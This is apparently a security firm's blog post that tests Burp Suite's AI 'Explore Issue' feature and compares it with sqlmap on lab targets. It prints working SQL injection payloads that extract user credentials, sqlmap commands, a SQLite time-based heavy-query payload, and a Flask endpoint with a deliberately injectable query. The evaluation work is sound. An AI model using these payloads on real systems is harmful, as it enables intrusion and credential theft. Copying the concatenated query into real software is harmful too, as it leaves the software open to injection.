
Burp AI - Evaluating the new AI Capabilities in Action

On March 31, 2025, PortSwigger officially released a new version of its security tool Burp Suite. We had already tested AI-powered extensions via the “Early Adopters” build of Burp Suite Pro and published our results in the blog post titled “Using AI in Security Testing” 1. However, those results were limited in scope and often too generic.

The new Burp Suite Release

With the official release of Burp Suite Professional 2025.2, PortSwigger introduced Burp AI 2. In a Zoom call, they presented all of their improvements and new functionality. Alongside performance improvements, they also demonstrated five new AI-related features. These are:

  • Explore Issue
  • Explainer
  • Broken access control false positive reduction
  • AI-powered recorded logins
  • AI-powered extensions

In the following sections, we test these new features using concrete examples. For our testing, we used Burp Suite Professional v2025.3-37651 (Early Adopter).

Explore Issue

With the “Explore Issue” functionality, you can task an AI with investigating an issue found by Burp Scanner via an active scan. The feature is accessible from the context menu of issues in the Dashboard. PortSwigger states the AI can be used to “efficiently validate issues, generate proof-of-concept (PoC) exploits, and uncover additional attack vectors” 3.

To do so, the AI has the following capabilities:

  • Select appropriate Burp tools to use.
  • Structure and send requests to test different exploitation techniques.
  • Handle responses dynamically, adjusting its approach based on the target system’s behavior.
  • Generate and validate PoC exploits to demonstrate real-world impact.
  • Identify additional attack vectors beyond Burp Scanner’s initial findings, including privilege escalation paths or data exposure risks.

Let’s give it a try and verify the promised functionality firsthand. First, we need a vulnerable application to run an active scan on and identify an issue. We used three different vulnerable applications to test the new features:

  • the OWASP Juice Shop,
  • a PortSwigger Academy lab and
  • a self-developed Python web application.

To better understand the AI’s workflow, we compared multiple issue explorations involving similar vulnerabilities — specifically, SQL injections. This allows us to analyze how the AI adapts its approach depending on the context, as well as to assess the overall cost and value of the feature.
Our evaluation begins with a straightforward SQL injection in the well-documented “Juice Shop”. We then move on to a slightly obfuscated version to test the AI’s ability to interpret context, and finally, we examine a fully custom, timing-based SQL injection to assess how it handles more complex and less conventional scenarios.

SQL injection in the Juice Shop

The OWASP Juice Shop is a deliberately insecure web application designed to help users learn and practice modern web security testing. For our evaluation, we used version 17.2.0. One of its known vulnerabilities is a SQL injection flaw in the product search bar — a textbook example of a common attack vector.

To detect this issue, Burp Suite’s active scanner can be used. By highlighting the q parameter in the search request with the Inspector and running an active scan, the scanner flags the SQL injection and logs it as an issue in the dashboard.

Active Scan finds SQL injection in the Juice Shop search

From here, the new “Explore Issue” feature lets you delegate the investigation to the AI. To get started, click the Explore issue button after selecting a vulnerability. This opens a new Task in the Dashboard, where you can track its progress in real time.

The AI then performs a step-by-step analysis of the issue, recording each action it takes along with the reasoning and results. If it uses tools like Repeater or Inspector during the process, you’ll see visual representations at the relevant steps.

Once the investigation is complete, a summary is generated that outlines what the AI did and what it found.

AI Exploration of the SQL injection in the Juice shop search

The steps the AI executed for this exploration are:

  1. [ 91 credits] Determine the number of columns in the production table via UNION SELECT with NULL
  2. [ 78 credits] Retry the column count with proper URL encoding
  3. [105 credits] Enumerate the database tables
  4. [ 73 credits] Retrieve the schema of the Users table
  5. [162 credits] Extract user credentials from the Users table and generate the summary

Total credit usage: 509 credits (0.25€)

Using these steps, the AI successfully exploited the vulnerability and exfiltrated user credentials. The final command used is the following GET request:

/rest/products/search?q=%27))%20UNION%20SELECT%20id,email,password,role,role,role,role,role,role%20FROM%20Users-- 
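For reference, the exploit URL above can be rebuilt from the raw payload with Python’s standard library; this is just a minimal sketch that reproduces the encoding of the request line, nothing Burp-specific:

```python
from urllib.parse import quote

# Raw UNION-based payload as derived by the AI exploration
payload = "')) UNION SELECT id,email,password,role,role,role,role,role,role FROM Users--"

# URL-encode everything except ")" and "," to match the request line above
encoded = quote(payload, safe="),")
path = f"/rest/products/search?q={encoded}"
print(path)
```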

While the overall process was technically correct, much of it relied on guesswork. This was largely due to the fact that query responses were truncated after a predefined length — likely to conserve token usage. As a result, essential information was cut off. A human tester would have spotted this missing data, but the AI had to infer or guess instead.

A test with sqlmap shows that this tool would also have been able to exploit the vulnerability. Running the following command detected boolean-based blind and time-based blind entry points:

sqlmap -u http://localhost:5000/rest/products/search?q=search --risk=3 --level=3 -p q

However, since the Juice Shop is a well-known target with publicly available solutions, it’s not ideal for testing the AI’s broader capabilities. To get a more accurate sense of its effectiveness, we’ll need to use a custom or less-documented vulnerability.

SQL injection in PortSwigger Academy

The second SQL injection we want to explore is part of the PortSwigger Academy. The exact lab used is called “SQL injection attack, listing the database contents on non-Oracle databases”. This time the task is a bit more challenging, because the name of the table holding usernames and passwords is randomized.

Again, the AI tries to determine the number of columns in the query via a UNION SELECT with NULL and manages to determine there are two columns in the response.

  1. [ 54 credits] Determine the number of columns in query
  2. [ 60 credits] Try UNION SELECT with two columns
  3. [ 98 credits] Enumerate the database tables
  4. [109 credits] Enumerate the columns in users table
  5. [119 credits] Extract usernames and passwords
  6. [131 credits] List user-created tables and schemas
  7. [150 credits] Get column information for users_xzcvaz table
  8. [165 credits] Extract usernames and passwords from users_xzcvaz and generate summary

Total credit usage: 965 credits (0.48€)

The AI summarises its exploitation as follows:

We have successfully extracted credentials from the users_xzcvaz table, obtaining username and password pairs for multiple users including administrator ([pw]), carlos ([pw]), and wiener ([pw]). The credentials were stored in plaintext format in a Postgres database.

The correct table and column names were found on the second try, even though their names are slightly obfuscated.
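The NULL-based column-count probe the AI applied against both targets can be sketched as a simple payload generator; the helper name below is ours, not part of Burp:

```python
def union_probe_payloads(max_cols: int = 4) -> list[str]:
    """Generate ' UNION SELECT NULL,... payloads with an increasing
    column count; the first one that does not error reveals the width."""
    return [
        "' UNION SELECT " + ",".join(["NULL"] * n) + "--"
        for n in range(1, max_cols + 1)
    ]

print(union_probe_payloads(2))
```

In the Academy lab, the payload with two NULLs is the first that succeeds, which tells the AI the query returns two columns.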

The tool sqlmap manages to find four injection points: boolean-based blind, stacked queries, time-based blind and UNION query. With it, extracting usernames and passwords is also possible and just as fast. The command used is:

sqlmap -u "https://<session-id>.web-security-academy.net/filter?category=Gifts" --risk=3 --level=3 -p category

SQL injection in custom Flask server

To further test the limits of the exploration functionality, we wrote a small Flask server in Python. This allows for fine-tuning of the injection complexity.

As a simple test scenario, we set up an endpoint vulnerable to timing-based attacks through an input parameter called password. When a request is received, the server queries a SQLite3 database and returns the query execution time in the response. A simple WAF that blocks all requests containing “OR” is present to increase the difficulty.

import sqlite3
import time

from flask import Flask, request

app = Flask(__name__)
db_filename = "users.db"  # database path (name assumed; defined elsewhere in the original server)


@app.route("/timing")
def timing():
    """
    # Solution:
    GET /timing?password=pwA...%%27%20AND%201337=LIKE(%27ABCDEFG%27,UPPER(HEX(RANDOMBLOB(500000000/2))))%20--
    """
    start = time.time()
    password = request.values.get("password", "")

    # Naive WAF: reject any request whose payload contains "OR".
    if "OR" in password:
        return "Blocked by WAF"

    with sqlite3.connect(db_filename) as db:
        cursor = db.cursor()

        try:
            # Vulnerable SQL query built by concatenating user-provided input.
            sql_command = (
                "SELECT * FROM users WHERE username = 'admin' AND password LIKE '%s'"
                % (password)
            )
            res = cursor.execute(sql_command)
            print(sql_command)

            # If the query returns any matching record, consider the current user logged in.
            record = res.fetchone()
        except Exception as e:
            print(f"[ERR]: {e}")

    response = "Answer returned after {elapsed_time:.4f} seconds."
    return response.format(elapsed_time=time.time() - start)

By manipulating the input and observing how long the query takes, it’s possible to exploit this timing behavior. Specifically, you can infer the correct password character by character, based on how the response time changes with each guess.
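The character-by-character inference described above can be simulated without a running server. In the sketch below, query_time is a stand-in for timing a request to the vulnerable /timing endpoint, and the secret value is purely illustrative:

```python
import string

SECRET = "pwA"  # illustrative stand-in for the password stored in the database


def query_time(guess: str) -> float:
    """Simulated timing oracle: the injected LIKE prefix makes the
    query noticeably slower whenever it matches the stored password."""
    return 0.5 if SECRET.startswith(guess) else 0.01


def recover_password(max_len: int = 8, threshold: float = 0.1) -> str:
    """Recover the password one character at a time by picking,
    at each position, the candidate that triggers a slow response."""
    recovered = ""
    for _ in range(max_len):
        for ch in string.ascii_letters + string.digits:
            if query_time(recovered + ch) > threshold:
                recovered += ch
                break
        else:
            # No candidate produced a delay: the password is complete.
            break
    return recovered


print(recover_password())
```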

  1. [54 credits] Test for TRUE condition in SQL injection
  2. [59 credits] Test for boolean-based blind SQL injection
  3. [66 credits] Test for time-based SQL injection with proper encoding
  4. [73 credits] Test PostgreSQL-specific time-based injection
  5. [80 credits] Test for SQLite database with version check
  6. [87 credits] Test SQLite with heavy processing condition
  7. [81 credits] Write summary

Total credit usage: 500 credits (0.25€)

The AI’s exploration process was impressive in its methodology, even if it didn’t fully succeed in exploiting the vulnerability. It correctly identified that the backend database was SQLite and quickly pivoted to a timing-based SQL injection strategy, which is the right direction given the context. However, the attack failed to trigger meaningful time delays. This was likely due to SQLite’s atypical handling of the randomblob() function, which requires a slightly non-standard payload to induce a measurable latency — something the AI did not manage to detect. Despite the failure, the AI made several informed attempts, consuming 500 AI credits in total.
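The delay primitive in question works by forcing SQLite to hex-encode and uppercase a large random blob before the LIKE comparison. A scaled-down, self-contained demonstration using Python’s built-in sqlite3 module (blob sizes are reduced here for practicality):

```python
import sqlite3
import time


def measure(blob_bytes: int) -> float:
    """Time a query that hex-encodes and uppercases a random blob,
    the same construct the heavy-query payload relies on."""
    con = sqlite3.connect(":memory:")
    start = time.time()
    con.execute(
        "SELECT LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(?))))", (blob_bytes,)
    ).fetchone()
    con.close()
    return time.time() - start


# A larger blob takes measurably longer: that difference is the side channel.
print(measure(10_000_000) > measure(100))
```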

Interestingly, even tools like sqlmap struggled in this scenario. Only with an optimized command that raises the test level to 5 is the injection point found; otherwise it is registered as a false positive.

sqlmap -u http://localhost:3000/timing?password=pwA --level=5 --risk=3 -p password --dbms=SQLite --technique=T
sqlmap identified the following injection point(s) with a total of 88 HTTP(s) requests:
---
Parameter: password (GET)
    Type: time-based blind
    Title: SQLite > 2.0 AND time-based blind (heavy query)
    Payload: password=a'||(SELECT CHAR(66,82,100,100) WHERE 6644=6644 AND 6200=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))))||'
---
[05:13:29] [INFO] the back-end DBMS is SQLite

Comparing the Explorations

The AI’s exploration process is adaptive — each step is informed by the outcomes of previous ones. This dynamic approach allows it to respond to subtle obfuscations, such as changes in parameter or function names, as demonstrated in the second test.

Even if the exploration doesn’t lead to a successful exploit, the process still provides valuable learnings. Step-by-step visibility gives you a clear view of the AI’s reasoning and actions, making it easy to manually verify, replicate or refine its approach. In addition, any AI-generated requests can be passed to Repeater or Intruder for deeper manual testing.

Generating a new step typically takes around 10 seconds, which provides a reasonable pace for automated exploration. The cost per exploration varies between 400 and 1,000 AI credits. Given that 10,000 credits cost 5€, this translates to approximately 0.20€ to 0.50€ per exploration.
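The pricing above boils down to a simple conversion; the helper below is just our own arithmetic based on the stated pack price of 5€ for 10,000 credits:

```python
CREDITS_PER_PACK = 10_000
PACK_PRICE_EUR = 5.0


def exploration_cost_eur(credits: int) -> float:
    """Convert AI credit usage into euros at the pack rate."""
    return credits * PACK_PRICE_EUR / CREDITS_PER_PACK


# e.g. the three explorations in this post (509, 965 and 500 credits)
print(exploration_cost_eur(509), exploration_cost_eur(965), exploration_cost_eur(500))
```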

If the AI succeeds, you get a simple, reproducible exploit that demonstrates the vulnerability. However, if it doesn’t, further manual testing is still required. It’s also important to note that AI exploration is limited to issues identified through a Burp Suite scan — you can’t define custom targets manually or provide extra context to guide the AI during its analysis.

Test object  | Vulnerability              | Cost        | Burp AI | sqlmap
Juice Shop   | Simple SQL injection       | 509 credits | ✓       | ✓
PortSwigger  | Obfuscated SQL injection   | 965 credits | ✓       | ✓
Flask        | Timing-based SQL injection | 500 credits | ✗       | ✓

Compared with tools like sqlmap, there is not much of an advantage. Instead of one vulnerability, sqlmap manages to identify multiple entry points and also lets you exploit them conveniently. Additionally, it is more configurable and deterministic in its execution.

One advantage of the AI is the small number of requests it uses. Usually only a single request is generated per step, which is a lot “quieter” than the dozens of requests sqlmap sends while exploring.

Explainer

Apart from the issue exploration, PortSwigger also introduced a new functionality called Explainer. In the Repeater, you can now highlight text, right-click, and select “Explain this” from the context menu. The explanation then appears in the Explanations section of the sidebar. Its use cases are:

  • Gathering information, such as identifying which framework uses a particular header
  • Explaining JavaScript code, HTTP headers, cookies, or HTML tags from a security perspective

“Explain this” button in context menu of selection
Explanation in Sidebar

The generated explanations are concise and technically focused, often zeroing in on the relevant libraries or parameters. It’s clear that a prompt template is guiding the response to keep it short and centered on technical detail. In contrast, a ChatGPT-4o response tends to be longer by default unless explicitly asked to respond in one or two sentences.

As noted in our previous Burp AI blog post 1, response length correlates with cost. Thanks to its brevity, each explanation here only costs 3 AI credits.

The main advantage lies in convenience — you get quick insights without leaving Burp Suite to do basic security research.

Broken access control false positive reduction

PortSwigger aims to reduce the number of false positive issues with their automated scans by using AI to double-check the issues. Currently, this functionality is only implemented for “Broken access control” issues.

While this approach shows potential, a simpler and more reliable alternative is the “Autorize” extension, available through the BApp Store. It offers effective manual and semi-automated testing for access control issues without relying on AI verification.

AI-powered recorded logins

Repeated login attempts can be frustrating during testing. The recorded login functionality is therefore a welcome addition. It allows you to automatically record simple login sequences, removing the need to configure macros manually.

Xre0us, however, found no benefit compared to setting up a login macro yourself in his blog post. He concludes that simple logins, like the ones the AI can generate, can be set up more cheaply by hand, and that the AI fails to configure more complex login scenarios.

AI-powered extensions

In a previous blog post, we already explored the functionality provided by integrating an AI API into extensions. We also compared existing extensions that use the AI capabilities in terms of cost and performance, and built our own example extension. You can find our findings here.

Conclusion

The new AI tools are clearly focused on specific functionalities. This specialization allows for fine-tuning within a defined context, a key factor, as we concluded in our last blog post.

Still, the testing results point to an evolution in convenience, not a revolution in capability. While the added context does improve response quality, it also highlights a core limitation — like other automated tools, the AI adapts to known vulnerabilities but lacks true creativity or problem-solving beyond established patterns. Ultimately, most of what it achieved could have been done more reliably and at a lower cost using conventional, dedicated tools.

Overall, the new AI features serve primarily as a convenience. They allow for quick exploration of issues — not necessarily to confirm a vulnerability, but to spark ideas for further investigation. However, their usefulness tends to diminish with increased experience in cybersecurity, especially when weighed against the additional costs, compared to established tools.

Further Reading


  1. Using AI in Security Testing, smarttecs. Available at: https://blog.smarttecs.com/posts/2025-001-burp-ai/

  2. Welcome to the next generation of Burp Suite: elevate your testing with Burp AI, PortSwigger. Available at: https://portswigger.net/blog/welcome-to-the-next-generation-of-burp-suite-elevate-your-testing-with-burp-ai

  3. Exploring issues with AI, PortSwigger. Available at: https://portswigger.net/burp/documentation/desktop/running-scans/explore-issue-with-ai